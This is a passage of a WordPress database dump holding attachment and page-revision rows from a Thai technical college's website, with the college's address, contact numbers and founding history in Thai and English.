(3712, 3, '2018-08-14 10:40:16', '2018-08-14 03:40:16', '', 'หนังสือเรียกร้องค่าสินไหมทดแทน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%99%e0%b8%b1%e0%b8%87%e0%b8%aa%e0%b8%b7%e0%b8%ad%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%81%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b9%88%e0%b8%b2%e0%b8%aa%e0%b8%b4%e0%b8%99', '', '', '2018-08-14 10:40:16', '2018-08-14 03:40:16', '', 1792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/หนังสือเรียกร้องค่าสินไหมทดแทน.pdf', 0, 'attachment', 'application/pdf', 0),
(3713, 3, '2018-08-14 10:41:55', '2018-08-14 03:41:55', '', 'หนังสือสละสิทธิ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%99%e0%b8%b1%e0%b8%87%e0%b8%aa%e0%b8%b7%e0%b8%ad%e0%b8%aa%e0%b8%a5%e0%b8%b0%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98%e0%b8%b4', '', '', '2018-08-14 10:41:55', '2018-08-14 03:41:55', '', 1792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/หนังสือสละสิทธิ.pdf', 0, 'attachment', 'application/pdf', 0),
(3714, 3, '2018-08-14 10:42:39', '2018-08-14 03:42:39', '<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n<h4><img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" /><a href=\"/wp-content/uploads/2018/08/หนังสือแนะนำการเบิกประกันฯ.pdf\">> หนังสือแนะนำการเบิกประกันฯ</a></h4>\r\n<h4><a href=\"/wp-content/uploads/2018/08/หนังสือเรียกร้องค่าสินไหมทดแทน.pdf\">> หนังสือเรียกร้องค่าสินไหมทดแทน</a></h4>\r\n<h4><a href=\"/wp-content/uploads/2018/08/หนังสือสละสิทธิ.pdf\">> หนังสือสละสิทธิ</a></h4>\r\n<h4></h4>\r\n ', 'งานสวัสดิการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1792-revision-v1', '', '', '2018-08-14 10:42:39', '2018-08-14 03:42:39', '', 1792, 'http://www.technicrayong.ac.th/1792-revision-v1/', 0, 'revision', '', 0),
(3716, 3, '2018-08-14 10:50:31', '2018-08-14 03:50:31', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><strong>Rayong Technical College Background </strong></h2>\r\n<strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,\r\n\r\nMuang District, Rayong, Thailand 21000\r\n\r\nTel: 038-611-160, 038-611-192 Fax: 038-970-717\r\n\r\nThe area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)\r\n\r\n<strong>Background,</strong> on the 3<sup>rd </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.\r\n\r\n<strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the 1st of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today “Rayong Technical College\r\n\r\n ', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-14 10:50:31', '2018-08-14 03:50:31', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3718, 3, '2018-08-14 10:52:16', '2018-08-14 03:52:16', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><strong>Rayong Technical College Background </strong></h2>\r\n<strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,\r\n\r\n<span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000\r\n\r\n<span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717\r\n\r\n<span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)\r\n\r\n<strong>Background,</strong> on the 3<sup>rd </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.\r\n\r\n<strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the 1st of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today “Rayong Technical College\r\n\r\n ', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-14 10:52:16', '2018-08-14 03:52:16', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3720, 3, '2018-08-14 11:00:28', '2018-08-14 04:00:28', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><b>ประวัติวิทยาลัยเทคนิคระยอง</b></h2>\r\n<b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช\r\n\r\n<span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000\r\n\r\n<span style=\"color: #ffffff;\">0000000000</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717\r\n\r\n<span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา\r\n\r\n<b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน\r\n\r\n<b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:00:28', '2018-08-14 04:00:28', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3721, 3, '2018-08-14 11:03:34', '2018-08-14 04:03:34', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h1><b>ประวัติวิทยาลัยเทคนิคระยอง</b></h1>\r\n<h3><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</h3>\r\n<h3><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</h3>\r\n<h3><span style=\"color: #ffffff;\">0000000000</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</h3>\r\n<h3><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</h3>\r\n<h3><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</h3>\r\n<h3><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:03:34', '2018-08-14 04:03:34', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3722, 3, '2018-08-14 11:06:09', '2018-08-14 04:06:09', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h1><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h1>\r\n<h3><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</h3>\r\n<h3><span style=\"color: #ffffff;\">0000000000</span>ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</h3>\r\n<h3><span style=\"color: #ffffff;\">0000000000</span>โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</h3>\r\n<h3><span style=\"color: #ffffff;\">0000000000</span>มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</h3>\r\n<h3><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</h3>\r\n<h3><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<img class=\"aligncenter wp-image-3090 size-full\" src=\"/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg\" alt=\"\" width=\"800\" height=\"671\" />\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-08-14 11:06:09', '2018-08-14 04:06:09', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3723, 3, '2018-08-14 11:07:28', '2018-08-14 04:07:28', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><b>ประวัติวิทยาลัยเทคนิคระยอง</b></span></h2>\r\n<h3><span style=\"color: #808080;\"><b>สถาน</b><b>ที่ตั้ง </b><b> </b>วิทยาลัยเทคนิคระยองตั้งอยู่เลขที่ 086/13 ถนนตากสินมหาราช</span></h3>\r\n<h3><span style=\"color: #808080;\">0000000000ตำบลท่าประดู่ อำเภอเมือง จังหวัดระยอง 21000</span></h3>\r\n<h3><span style=\"color: #808080;\">0000000000โทรศัพท์ 038-611-160, 038-611-192 โทรสาร 038-870-717</span></h3>\r\n<h3><span style=\"color: #808080;\">0000000000มีพื้นที่ 76 ไร่ 2 งาน 17 ตารางวา</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b> <i>เมื่อวันที่ 3 ตุลาคม 2481</i> กรมอาชีวศึกษากรมอาชีวศึกษาร่วมกับจังหวัดระยองได้จัดตั้ง <i>\"โรงเรียนช่างไม้ระยอง\" </i>ขึ้นโดยอาศัยศาลาการเปรียญของวัดเก๋ง ซึ่งเป็นวัดร้าง (ปัจจุบันเป็นสถานที่ตั้งของโรงพยาบาลระยอง) เป็นสถานที่เรียนชั่วคราว ต่อมาได้รับบริจาคที่ดินจำนวน 5 ไร่ จาก นายเหลียง เปี่ยมพงศ์สานต์ และจัดตั้งเป็นสถานศึกษาอันเป็นตำบลที่ตั้งของวิทยาลัยเทคนิคระยองในปัจจุบัน</span></h3>\r\n<h3><span style=\"color: #808080;\"><b>ความเป็นมา</b><b> </b><i>ในปีพ.ศ.2501</i> ได้ซื้อที่ดินเพิ่มขึ้นอีก 5 ไร่ ได้รับอนุมัติให้เปลี่ยนชื่อเป็น <i>\"โรงเรียนการช่างไม้ระยอง\" </i>เมื่อ พ. ศ. 2509 กระทรวงศึกษาธิการประกาศรวม <i>\"โรงเรียนการช่างไม้ระยอง\" </i>และ <i>\"โรงเรียนการช่างสตรีระยอง\" </i>เป็นโรงเรียนเดียวกัน ให้ชื่อว่า <i>\"โรงเรียนการช่างระยอง\" </i>และได้รับอนุมัติให้ชื่อเป็น <i>\"โรงเรียนเทคนิคระยอง\" </i>เมื่อวันที่ 1 พฤษภาคม 2520 ต่อมาได้รับการยกฐานะจากโรงเรียนเป็นวิทยาลัยโดยให้ชื่อเป็น <i>\"วิทยาลัยเทคนิคระยอง\" </i>ตั้งแต่วันที่ 1 พฤษภาคม 2523 จนถึงปัจจุบัน</span></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;\"><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" 